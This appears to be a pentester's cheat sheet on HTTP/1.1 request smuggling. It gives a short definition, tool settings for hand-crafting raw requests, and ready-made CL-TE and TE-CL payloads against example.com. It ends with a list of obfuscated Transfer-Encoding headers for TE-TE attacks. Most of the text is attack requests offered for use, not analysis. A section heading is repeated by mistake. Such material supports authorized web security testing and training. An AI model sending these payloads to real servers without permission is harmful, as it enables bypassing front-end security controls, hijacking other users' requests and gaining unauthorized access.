What is Request Smuggling HTTP/1.1
A vulnerability where attackers exploit discrepancies in how HTTP/1.1 requests are parsed by different servers (e.g., a proxy and a backend). By manipulating headers like Transfer-Encoding and Content-Length, an attacker can craft requests that are interpreted differently by each server, potentially bypassing security filters, causing unauthorized access, or smuggling malicious requests to be processed by the backend.
Methodology
# IMPORTANT SETTING
- Remove update content length
- Set request as HTTP/1.1 (Setting & Request)
- Enalbe visualisation of the \r \n characters
Important to understand that (\r & \n) count as characters during process
---------------------------------------------------------------------------------
# Identify the Front-End Server header
Content-Length (CL) or Transfer-Encoding (TE)
----------------------------------------------------------------------------------
# Identify the Front-End Server header
Content-Length (CL) or Transfer-Encoding (TE)Payloads
# CL-TE
POST / HTTP/1.1
Host: example.com
Content-Length: 6
Transfer-Encoding: chunked
0
GPOST / HTTP/1.1
Host: example.com
----------------------------------------------------------------------------------
# TE-CL
POST / HTTP/1.1
Host: example.com
Transfer-Encoding: chunked
Content-Length: 6
0
X
----------------------------------------------------------------------------------
# TE-TE (obfuscating the TE header)
Transfer-Encoding: xchunked
Transfer-Encoding : chunked
Transfer-Encoding: chunked
Transfer-Encoding: x Transfer-Encoding:[tab]chunked
[space]Transfer-Encoding: chunked
X: X[]Transfer-Encoding: chunked
Transfer-Encoding : chunked